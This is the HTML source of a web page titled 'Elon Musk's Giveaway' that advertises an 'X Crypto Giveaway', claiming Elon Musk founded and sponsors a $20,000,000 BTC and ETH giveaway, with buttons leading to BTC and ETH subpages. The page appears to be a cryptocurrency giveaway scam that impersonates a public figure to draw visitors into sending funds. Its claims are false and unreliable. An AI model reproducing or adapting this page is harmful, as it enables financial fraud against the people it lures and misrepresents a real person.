<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <meta
      name="viewport"
      content="width=device-width, initial-scale=1.0, maximum-scale=1" />
    <link rel="stylesheet" href="css/JcXy3dDpEExI.css" />
    <link rel="stylesheet" href="css/fwfaqY0KZGMF.css" />
    <link
      rel="shortcut icon"
      href="images/69TI3NDqwRx9.png"
      type="image/x-icon" />
    <title>Elon Musk's Giveaway</title>
    <!-- Matomo -->
    <!-- <script async="" src="js/t5li68IaWoW3.js"></script>
    <script>
      var _paq = (window._paq = window._paq || []);
      /* tracker methods like "setCustomDimension" should be called before "trackPageView" */
      _paq.push(["trackPageView"]);
      _paq.push(["enableLinkTracking"]);
      (function () {
        var u = "https://elonxx.matomo.cloud/";
        _paq.push(["setTrackerUrl", u + "matomo.php"]);
        _paq.push(["setSiteId", "5"]);
        var d = document,
          g = d.createElement("script"),
          s = d.getElementsByTagName("script")[0];
        g.async = true;
        g.src = "https://cdn.matomo.cloud/elonxx.matomo.cloud/matomo.js";
        s.parentNode.insertBefore(g, s);
      })();
    </script> -->
    <!-- End Matomo Code -->

    <style>
      .info-content {
        display: flex;
        width: 100%;
        justify-content: space-between;
      }

      .info-content > .info-head {
        flex-direction: column;
        align-items: flex-start;
      }

      .info-content > .info-head > .info-head-content > * {
        text-align: left;
      }

      .info-video {
        margin-bottom: 60px;
        max-width: 480px;
        display: flex;
        justify-content: center;
        align-items: center;
      }

      .info-video > * {
        width: 100%;
        height: auto; /* Change to auto for better aspect ratio */
        object-fit: contain;
        object-position: bottom;
      }

      @media screen and (max-width: 1028px) {
        .info-content {
          flex-direction: column;
          align-items: center;
          gap: 40px;
        }

        .info-video {
          margin: 0;
        }

        .info-content > .info-head > .info-head-content > * {
          text-align: center;
        }

        .info-content > .info-head {
          align-items: center;
        }
      }
    </style>
  </head>

  <body>
    <div class="responsive-wrapper">
      <div class="vis"></div>
      <div class="responsive-head">
        <div class="container">
          <header>
            <a href="#" class="logo">
              <img src="images/MgvnfGwereOy.svg" alt="" />
            </a>
            <div class="current-items">
              <div class="item">
                <img src="images/uyza6YDEhD7k.svg" alt="" />
                <div class="current type-ca wait">
                  <p>$<span>0.6725</span></p>
                  <span><span>4.54</span>%</span>
                </div>
              </div>
              <div class="item">
                <img src="images/rn4miag1hpFs.svg" alt="" />
                <div class="current type-cb wait">
                  <p>$<span>0.6725</span></p>
                  <span><span>4.54</span>%</span>
                </div>
              </div>
            </div>
          </header>
        </div>
      </div>
      <div class="responsive-main">
        <div class="item item-a active">
          <div class="container">
            <div class="info">
              <div class="info-content">
                <div class="info-head">
                  <div class="image-creator">
                    <img src="images/T7IwkyhOfMwD.png" alt="" />
                  </div>
                  <div class="info-head-content">
                    <h1>X Crypto Giveaway</h1>
                    <p>
                      Good Luck Everyone! <br />A great opportunity to grow your
                      capital!<br /><br />The giveaway? It's our way to say:
                      "Thank you!".
                    </p>
                  </div>
                  <div class="info-head-action">
                    <a href="btc/index.html" class="button button-a type-a">
                      <p>BTC Giveaway</p>
                    </a>
                    <a href="eth/index.html" class="button button-a type-b">
                      <p>ETH Giveaway</p>
                    </a>
                  </div>
                </div>
              </div>
              <div class="info-bottom">
                <div class="item">
                  <h1>Elon Musk</h1>
                  <p>
                    The founder of this event and one of the main sponsors of
                    the event
                  </p>
                </div>
                <div class="item">
                  <h1>$20,000,000</h1>
                  <p>Allocated for the giveaway</p>
                </div>
                <div class="item">
                  <h1>60 BTC / 300 ETH</h1>
                  <p>
                    Max amount that we can get on your crypto wallet after
                    participating in this event
                  </p>
                </div>
                <div class="item">
                  <h1>Terms of participation</h1>
                  <p>Important: you can only participate ONCE!</p>
                </div>
              </div>
            </div>
          </div>
          <div class="info-cover">
            <img src="images/oXDa7z6acttd.png" alt="" />
          </div>
        </div>
      </div>
    </div>

    <script src="js/DLkOWqEofVAm.js"></script>
    <script src="js/HEBNjk2ZRYtE.js"></script>
    <script src="js/P1ZQ1nDDUo0d.js"></script>
  </body>
</html>
